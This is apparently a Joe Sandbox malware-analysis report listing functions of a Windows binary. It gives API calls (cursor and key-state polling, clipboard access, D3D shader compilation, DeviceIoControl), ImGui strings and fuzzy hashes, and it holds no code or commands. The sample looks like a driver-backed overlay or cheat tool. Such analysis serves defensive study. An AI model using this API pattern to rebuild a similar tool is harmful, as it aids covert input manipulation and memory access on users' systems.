Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 6fedbc78968b30b7f1f03fb1f3ac9b2b1c419955e7baa5e051dbe15001b4c7f8
Instruction ID: 9efd00229ea24a41cc99911a3f6a1d0dd83f8d3ed4152e0e0e133890081ce8f5
Opcode Fuzzy Hash: 6fedbc78968b30b7f1f03fb1f3ac9b2b1c419955e7baa5e051dbe15001b4c7f8
Instruction Fuzzy Hash: A8C21032A14A908BE754DF36C44076DB7A0FB48B88F488236EE4E63795DF39E894C714

Function 00007FF758031D00 Relevance: 16.7, APIs: 11, Instructions: 193
keyboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClientRect.USER32 ref: 00007FF758031D59
QueryPerformanceCounter.KERNEL32 ref: 00007FF758031D91
GetForegroundWindow.USER32 ref: 00007FF758031DE1
ClientToScreen.USER32 ref: 00007FF758031E1C
SetCursorPos.USER32 ref: 00007FF758031E2E
GetCursorPos.USER32 ref: 00007FF758031E48
ScreenToClient.USER32 ref: 00007FF758031E5A
GetKeyState.USER32 ref: 00007FF758031E96
GetKeyState.USER32 ref: 00007FF758031EE8
GetKeyState.USER32 ref: 00007FF758031F3A
GetKeyState.USER32 ref: 00007FF758031F8C

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: State$Client$CursorScreen$CounterForegroundPerformanceQueryRectWindow
String ID:
API String ID: 1576454153-0
Opcode ID: f1d52d753b281553c96644c21e4a79c876e43cdde508353dfa369c6c4b04dc14
Instruction ID: a4f825fd028a4ae7c9c525b4c928606148eb55f8964e9fc68a91fa066db5b8e9
Opcode Fuzzy Hash: f1d52d753b281553c96644c21e4a79c876e43cdde508353dfa369c6c4b04dc14
Instruction Fuzzy Hash: 0981D831B18646C7FB10BB22E50527AE3A0EF96780F984235FA5D176D6DF3CE4498724

Function 00007FF758030610 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 288
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

D3DCompile.D3DCOMPILER_47 ref: 00007FF7580306E6
D3DCompile.D3DCOMPILER_47 ref: 00007FF7580308E1
memset.VCRUNTIME140 ref: 00007FF75803094C

Strings

vs_4_0, xrefs: 00007FF7580306C5
POSITION, xrefs: 00007FF758030781
main, xrefs: 00007FF7580306B9
TEXCOORD, xrefs: 00007FF75803078F
COLOR, xrefs: 00007FF75803079D
ps_4_0, xrefs: 00007FF7580308C0

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: Compile$memset
String ID: COLOR$POSITION$TEXCOORD$main$ps_4_0$vs_4_0
API String ID: 2361541216-4144671839
Opcode ID: 475f4bddbf19612056318e6adf46c3d499f771148be866804debef9f16401b6d
Instruction ID: 58dad7db15c1654923b4cec0a53007db95e1135309fb2acfc6e4b9e465e1c82c
Opcode Fuzzy Hash: 475f4bddbf19612056318e6adf46c3d499f771148be866804debef9f16401b6d
Instruction Fuzzy Hash: A5F12572A04BC58AEB20DF65E8447DDB7A4F788B88F558126DB8C17B68DF39D148CB10

Function 00007FF758019C70 Relevance: 15.0, APIs: 10, Instructions: 50
clipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenClipboard.USER32 ref: 00007FF758019C7B
MultiByteToWideChar.KERNEL32 ref: 00007FF758019CAE
GlobalAlloc.KERNEL32 ref: 00007FF758019CC2
GlobalLock.KERNEL32 ref: 00007FF758019CD3
MultiByteToWideChar.KERNEL32 ref: 00007FF758019CF2
GlobalUnlock.KERNEL32 ref: 00007FF758019CFB
EmptyClipboard.USER32 ref: 00007FF758019D01
SetClipboardData.USER32 ref: 00007FF758019D0F
GlobalFree.KERNEL32 ref: 00007FF758019D1D
CloseClipboard.USER32 ref: 00007FF758019D23

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: ClipboardGlobal$ByteCharMultiWide$AllocCloseDataEmptyFreeLockOpenUnlock
String ID:
API String ID: 1965520120-0
Opcode ID: d151eeb8ca27365c128fa0ca0dc056ef502974bb9b1aad2b6739fa6ade5804a2
Instruction ID: dbda0a0ac75706d7e5964d71ab67ea47a27ccd65f478487b296a3cd01990f0f9
Opcode Fuzzy Hash: d151eeb8ca27365c128fa0ca0dc056ef502974bb9b1aad2b6739fa6ade5804a2
Instruction Fuzzy Hash: E7116021B09A8283EB14BB26BC04225E3A1FF89BE1F8C4135DA5E477E5DF3CD4488314

Function 00007FF758047400 Relevance: 13.8, APIs: 9, Instructions: 350
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__stdio_common_vsnprintf_s.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7580474B6
MultiByteToWideChar.KERNEL32 ref: 00007FF7580474D8
memset.VCRUNTIME140 ref: 00007FF758047506
MultiByteToWideChar.KERNEL32 ref: 00007FF75804751F
WideCharToMultiByte.KERNEL32 ref: 00007FF758047592
memset.VCRUNTIME140 ref: 00007FF7580475B3
WideCharToMultiByte.KERNEL32 ref: 00007FF7580475DA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF75804764B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF758047972

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: ByteCharMultiWide$_invalid_parameter_noinfo_noreturnmemset$__stdio_common_vsnprintf_s
String ID:
API String ID: 2975225152-0
Opcode ID: 3f7c384454ac157e8457c195c7135281c91ed420ef36237ab2b4967f218a5f18
Instruction ID: 493ffb985076750a768e771867d7ce108d63f0f7998e16f937b8c31ac6c6954d
Opcode Fuzzy Hash: 3f7c384454ac157e8457c195c7135281c91ed420ef36237ab2b4967f218a5f18
Instruction Fuzzy Hash: C3F19322E18B8486F300EB75E8411ADF3A1FB99798F545335EE8D27AA9DF38D185C704

Function 00007FF758035470 Relevance: 12.3, APIs: 8, Instructions: 278
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fa9e0eac6b441efac26cb2a2d27cd8c87292bb3963f74377fa5a87c8dc7d2ff
Instruction ID: 3611135298ce61d96da090c9a151671f4582e306b866d9a600fa79627789caa4
Opcode Fuzzy Hash: 1fa9e0eac6b441efac26cb2a2d27cd8c87292bb3963f74377fa5a87c8dc7d2ff
Instruction Fuzzy Hash: 93B1F512E59BCD43E413A23692027B5D2562F7B3C2D9CD732F94E315F29F2C718A8524

Function 00007FF75802E7E0 Relevance: 12.3, APIs: 8, Instructions: 253
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF75802E8D3
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF75802E8FD
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF75802E92C
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF75802E95B
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF75802EB58
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF75802EB86
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF75802EBB5
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF75802EBE0

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: sqrtf
String ID:
API String ID: 321154650-0
Opcode ID: 6597534efcc2c3714991107cf66fced44d23304f2a521e9887f7ae15d6bc5a01
Instruction ID: 9e250dc568f479837ae9cf6549acddd8aa7e85c4c0225f987e86df2a230dff3a
Opcode Fuzzy Hash: 6597534efcc2c3714991107cf66fced44d23304f2a521e9887f7ae15d6bc5a01
Instruction Fuzzy Hash: 37B1D622E38BCC81E223A63750821F6E250AFBF3C5F2DDB23FD88356B29B6561D55550

Function 00007FF758035100 Relevance: 12.2, APIs: 8, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee073dee94c04a44e8f8235924cbda74032be01d3e9cf976116d4a3b1496ccba
Instruction ID: dfdfe97383bf1051347bb4fb851d9e99e16355fc8910daa6532d5565d7ade88b
Opcode Fuzzy Hash: ee073dee94c04a44e8f8235924cbda74032be01d3e9cf976116d4a3b1496ccba
Instruction Fuzzy Hash: 2591D311E58BCD86E463A23692037B6E2951FBF3C1E6CD732B94D305F2AF5870D68524

Function 00007FF7580347D0 Relevance: 12.2, APIs: 8, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 574755d9cc077f980329cd5b665864c88a4d021959cc6a5c207300baa26420f4
Instruction ID: fb48ac89ad2f59b9665b5f24cc57bf2657b6ae8397a001108d6317aad6a7b2b4
Opcode Fuzzy Hash: 574755d9cc077f980329cd5b665864c88a4d021959cc6a5c207300baa26420f4
Instruction Fuzzy Hash: 5C819202E18FCE82F2A3623651436BCE2815FBE285E6C9733F95D341E29F5836D94528

Function 00007FF75800D270 Relevance: 12.1, APIs: 8, Instructions: 83clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00007FF75800D2BA
GetClipboardData.USER32 ref: 00007FF75800D2D9
CloseClipboard.USER32 ref: 00007FF75800D2E7
GlobalLock.KERNEL32 ref: 00007FF75800D305
WideCharToMultiByte.KERNEL32 ref: 00007FF75800D33C
WideCharToMultiByte.KERNEL32 ref: 00007FF75800D37C
GlobalUnlock.KERNEL32 ref: 00007FF75800D38A
CloseClipboard.USER32 ref: 00007FF75800D390

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: Clipboard$ByteCharCloseGlobalMultiWide$DataLockOpenUnlock
String ID:
API String ID: 846020896-0
Opcode ID: 15b2c5fe949820354eb95b061dab0a2a901fb8ed63ae8888e6322d3350e99280
Instruction ID: 7f1a3e4bc60cb71ff27923a1a739e80040f249e00d59191e10e1449ca16c519a
Opcode Fuzzy Hash: 15b2c5fe949820354eb95b061dab0a2a901fb8ed63ae8888e6322d3350e99280
Instruction Fuzzy Hash: EE316136B09B8283E710AF66B84016AF7E4FB88B94F880535DE5D07BA4DF3CD5858624

Function 00007FF75803D850 Relevance: 11.6, APIs: 4, Strings: 1, Instructions: 2846stringCOMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF75803DED1
memmove.VCRUNTIME140 ref: 00007FF75803DF03
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF75803DF30

Strings

#SCROLLY, xrefs: 00007FF75803DD75, 00007FF75803DDA0

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: memmove$strncmp
String ID: #SCROLLY
API String ID: 303274685-1064663049
Opcode ID: 5a0e0f298f2dd093e4b73bf532ccdd54c358084836e35d5c22dc181f5d3529cb
Instruction ID: 495ae6ed3362f6795fbebdca21ea26e61e22eefbd846d2c54f6e4bb998f5c419
Opcode Fuzzy Hash: 5a0e0f298f2dd093e4b73bf532ccdd54c358084836e35d5c22dc181f5d3529cb
Instruction Fuzzy Hash: DF531232A182998BE751EB36C2446BEF7A4EF59344F8D4235EA4C536D1DF38E848CB14

Function 00007FF75805CC30 Relevance: 10.8, APIs: 7, Instructions: 257COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF758045E50: DeviceIoControl.KERNEL32 ref: 00007FF758045ECC

Part of subcall function 00007FF758045CA0: DeviceIoControl.KERNEL32 ref: 00007FF758045D21

DeviceIoControl.KERNEL32 ref: 00007FF75805CD7C

Part of subcall function 00007FF758045BF0: DeviceIoControl.KERNEL32 ref: 00007FF758045C70

sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF75805CE8B
cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF75805CE9C
sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF75805CEC8
cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF75805CED9
sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF75805CEEA
cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF75805CF02

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: ControlDevice$cosfsinf
String ID:
API String ID: 726333414-0
Opcode ID: 13c68578b892d25337b03ab1f1b7ad126d5e0d55bfa98519080dd7bec264f488
Instruction ID: ec27e7b9a668f08c5f69f694a31ad7d6df60bc823bf8d639d7ee51efb9477e9a
Opcode Fuzzy Hash: 13c68578b892d25337b03ab1f1b7ad126d5e0d55bfa98519080dd7bec264f488
Instruction Fuzzy Hash: 7AD10D32D18FC946E213AB3550526B6E364BF7F3C4F599322F94D71A62EF28A0D68710

Function 00007FF758034DC0 Relevance: 10.7, APIs: 7, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c2ac79c62ee882e2b6028e7dbf2aac47853f2b2d864fc6e3e79028a6972f3e8
Instruction ID: 2a89a00fe0db83435f6d993c0092f90fea8186437cc32b0e4fdaec448932ceb3
Opcode Fuzzy Hash: 2c2ac79c62ee882e2b6028e7dbf2aac47853f2b2d864fc6e3e79028a6972f3e8
Instruction Fuzzy Hash: 8081B002D58FCD86F163723641426F9E2946FBB2C5EAD9723BC5E744F2AF1930DA4128

Function 00007FF75803B920 Relevance: 10.0, APIs: 2, Strings: 4, Instructions: 988COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF75803BAE4

Strings

hue, xrefs: 00007FF75803BD46
alpha, xrefs: 00007FF75803BDDB
0, xrefs: 00007FF75803C318
, xrefs: 00007FF75803C898

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: memmove
String ID: $0$alpha$hue
API String ID: 2162964266-2938412065
Opcode ID: f95b763d151dba84a953fe7dac34313d52570f101f61a4ee480b44ff3a740008
Instruction ID: 898f65ee6bd3e2a8f71a6ec104c1589f55ae29a0078d663adab8ec2f90a2b658
Opcode Fuzzy Hash: f95b763d151dba84a953fe7dac34313d52570f101f61a4ee480b44ff3a740008
Instruction Fuzzy Hash: 89B2E333E18B858BE311EB37D4411ADF360FF59388F589725EA4C625E6DF38A4889B14

Function 00007FF75805DCA8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

memset.VCRUNTIME140(?,?,?,00007FF7580012FC), ref: 00007FF75805DCBE
GetLastError.KERNEL32 ref: 00007FF75805DD09
IsDebuggerPresent.KERNEL32 ref: 00007FF75805DD21
OutputDebugStringW.KERNEL32 ref: 00007FF75805DD32

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF75805DD2B

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: DebugDebuggerErrorLastOutputPresentStringmemset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 1848478996-631824599
Opcode ID: e844b6f9e12aeed2afcab9d86a22819ee04982e1adce84078b275c4046463b94
Instruction ID: 4c56d696145fb83d864825324ce87031c299e5e9442730e5c156f31d843d0cad
Opcode Fuzzy Hash: e844b6f9e12aeed2afcab9d86a22819ee04982e1adce84078b275c4046463b94
Instruction Fuzzy Hash: FC114C32B14B8293F754AB22D6443B9F3A4FF44345F884535CA4D42A95EF3CE4A8C728

Function 00007FF7580146C0 Relevance: 8.4, APIs: 1, Strings: 4, Instructions: 871COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF75801473E

Part of subcall function 00007FF758028460: acosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7580284D4
Part of subcall function 00007FF758028460: ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7580284E3
Part of subcall function 00007FF758028460: cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF758028535

Strings

Debug##Default, xrefs: 00007FF758015502
(Auto-disabled ImGuiDebugLogFlags_EventClipper to avoid spamming), xrefs: 00007FF7580154E8
gfff, xrefs: 00007FF758015570
NewFrame(): ClearActiveID() because it isn't marked alive anymore!, xrefs: 00007FF758014C3C

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: acosfceilfcosfmemmove
String ID: (Auto-disabled ImGuiDebugLogFlags_EventClipper to avoid spamming)$Debug##Default$NewFrame(): ClearActiveID() because it isn't marked alive anymore!$gfff
API String ID: 3642441648-2113471822
Opcode ID: 32b5e8ad24c3b9d0c80a19e7b11250912477da1240351b5aff254f968c3453a4
Instruction ID: e0c62fe30fe3d09518cdc1a839d1bb71da992a3399702250af146bfa5c2e2acd
